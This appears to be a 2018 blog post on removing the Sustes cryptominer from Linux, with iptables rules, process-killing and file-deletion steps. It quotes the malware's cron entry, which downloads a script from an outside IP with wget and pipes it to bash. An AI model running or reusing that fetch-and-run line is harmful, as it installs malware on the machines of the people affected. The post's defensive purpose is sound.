Saturday, 27 October 2018

Blocking Sustes Malware/Ransomware with IPTables on Linux

Block the IP by the following commands.

iptables -A INPUT -s 192.99.142.246 -j DROP

iptables -A OUTPUT -s 192.99.142.246 -j DROP

iptables -A OUTPUT -j DROP -d 192.99.142.246

Now save the newly added IPtables configuration with below command.

/sbin/service iptables save

Additionally If you don't have any Application dependencies you can uninstall the below packages.

wget
curl

This is a cryptominer malware. You must delete it from your system, Process and files.

First delete this cron job. It runs under any user or root user, find the process called "sustes".

You can find this username with "top" or in output of this comand:

ps aux | grep sustes

Then kill with -9 the process sustes, use the below command

ps -ef | grep sustes

kill -9 <PID>


Then look at cron job of this user:

crontab -u username -l

If it has this string

* * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

then edit this crobjob


crontab -e -u username

or delete all by

crontab -r -u username

Then delete these files

 /var/tmp/sustes
 /var/tmp/sustes3
/var/tmp/wc.conf
/var/tmp/123